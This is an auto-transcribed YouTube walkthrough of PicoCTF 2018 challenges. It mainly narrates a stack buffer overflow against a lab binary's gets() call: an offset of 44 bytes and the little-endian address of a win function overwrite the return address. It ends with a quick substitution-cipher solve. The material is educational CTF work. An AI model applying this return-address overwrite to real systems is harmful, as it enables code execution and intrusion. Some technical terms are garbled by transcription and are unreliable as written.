 Hey YouTube, John Hammond, Pico CTF 2018. Buffer overflow one. Okay, now you're cooking. This time you can overflow the buffer and return the flag function in this program, sweet. We're giving the program and the source code, we can download it, I've already W get it, but we'll have to run on the shell server so we can actually receive their flag file just as we've done before. So let's go check out what we've downloaded here. We have the source file, so let's go vol.c, check it out, it will define some macros here to kind of have a buffer size and flag size. We have a win function that we'll just print out the flag file, okay, looks like that's how we get the flag. And the bone function is just running gets, which we know is a very dangerous function. We can check out man gets if we wanted to, man gets. And it says never use this function because it has significant security problems. So that's a buffer up, raises our privileges so we can run on the server and get the flag and then it runs the vulnerable function. So it'll jump to an address and that's pretty cool. You can see this gets return address thing. So that's neat. Let's go ahead and try and run this function and see if we can work with it. Let's mark it as executable, vol, please enter your string, awesome. And it says, okay, time to return and it will jump back to where it expected to return to in the program. Like I was right, please subscribe or whatever stupid stuff, but we do want to try and overflow this, right? Given the actual buffer size, so 32 characters, you can see I entered a crap ton of A's and it says, okay, time return, fingers crossed, we're jumping to this location. So if you didn't have this output, you can run D message and then actually get the very last couple of lines of it and you can see where your site fault is happening and how much you've actually overflowed EIP or the instruction pointer. So you're overflowing the return address as you've seen on the stack, we break through the local variables that we're receiving, we're going to end up overriding EPP and we're gonna end up overriding the return address. So EPP plus four on the stack and on the stack frame. So once we have a return address controllable, that way we can jump to whatever function we want. Let's go ahead and try and return to the win function. So first we need to know where that function is and I'm going to use readElf tack S to just view symbols on this binary here and we can see we do have a function called a win and it's at this location. So just as you saw when we ran it, when we ran Vuln without anything big, we'll just jump to a location back to main or location where we were in main, we can also jump to the very start of win and that's exact same kind of style of where the constant is in the binary. So we can just set that in little ending in format and then go ahead and try to actually jump to it. But we need it in little ending format, right? So you can do this with Python or you could just kind of do it by hand, but Python with the struct module, which is installed by default, you can use struct.pack with a little endian, so less than sign and a capital I for injure and then you'll supply this as a hex number and you'll get some information like that looks kind of random when you have it displayed in the terminal, but that's because it's just hex byte. So if I print out the representation of it with repper, you can see it's the backslash X and location in hex. So that's cool, right? Let's go ahead and try and find where our offset is or where we can go ahead and overflow this and actually run the win function. So we would go ahead and Python taxi, where is that print statement? Let's also do print a times, let's say we know our buffer is like 32, so let's go maybe like 36 or 40 and let's add on that string and let's pipe that into vuln and it says, okay, we're jumping to this location, maybe we didn't override it just enough, 44 and we jumped straight to the location that we wanted to and we know that because it's trying to cat out the flag file. Is since we're testing locally, if we wanted to, we could create our own fake flag and I do this a lot. I'll be like, John, please subscribe or like John wins or like John got the challenge or whatever and we will print out our local fake flag. So that's a cool way to do it. Now that we know we have this payload that will work, let's go ahead and try and connect to the server. So what I'm going to do is actually create a simple SSH script that will get me to where I want to be every time and I won't have to try and like SSH the same command every time. I just want 2018 Pico shell and let's create in the above directory, just an SSH dot SSH script. I still want to be able to enter my password. Whoa, I didn't want that. I wanted this SSH, John, Hammond, YouTube there and let's keep this back in our clipboard. Mark that as executable and now that we can connect to it, we'll enter our password, we're logged in. Let's get this just kind of in our directory or just output. So when I go back to get to the actual problems page, I can copy and paste it pretty easily. Let's get to buffer overflow one and we'll get to this location on the file system we'll just copy and paste it. So let's CD over there, right? Now let's run the same command that we had. It says, okay, time to return fingers crossed. We have overflowed and we've told the return address to overflow and instead be our win function and it pumps out the flag because we've called the win function just like that. Addresses are easy, slick. Let's do that, nano flag dot text, save it. Let's remove our cheesy please subscribe file. Let's remove our cheesy please subscribe file. Submit it and that challenge is now complete. What a win. Let's mark that as complete. Offer flow one, complete. Sweet. I am just gonna solve the next challenge because it's pretty simple. It's the identical same thing like same solution as the last Hertz challenge. Hertz is another substitution cipher, right? Just as we saw in the last one. So let's make directory Hertz two go ahead and neck back to it, get this string and we can again just slap this and quip quip and it works just fine for us. We will get the flag pretty easily. Substitution ciphers are easy. If you want it to, we can get every other part of it and mark though that and like say what that is and then it should know the rest of that string. It should be able to figure out what those question marks are because the clues will allow us to just say Pico CTF substitution ciphers are too easy. Let's solve it now. And then now that it's able to figure out all those letters it can get the rest of the flag. Kind of a cool trick to stop refreshing so I can actually highlight this. Oh my goodness. I hope you guys are having fun. I hope these are entertaining as they are educational because I'm an idiot. That's all. All right, let's do nano flag that text save it as we're good. Hertz two complete and that's that. Thanks so much for watching guys. Hope you enjoyed a little bit of buffer overflow, some cool stuff. I've done those a lot before in Ryan CTF, Ryan Nicholson CTF and other competitions. So there are plenty of videos on it but that's how we could just run through it for Pico CTF. All right, quick shout out for the people that support me on Patreon. Thank you guys so much. I can't say it enough. $1 a month on Patreon will give you a special shout out just like this at the end of every video. $5 or more on Patreon will give you early access, everything that are released on YouTube before it goes live. Thanks so much for watching. If you did like this video, please do like, comment and subscribe. Join our Discord server, link in the description. It's a cool community full of CTF players, programs and hackers. Hang out with me, a bunch of other cool people, learn a lot of stuff and just kind of get engaged in the scene and the community. Thanks. Love you guys. Hope to see you in the next video. Hope to see you on Patreon. Take it easy.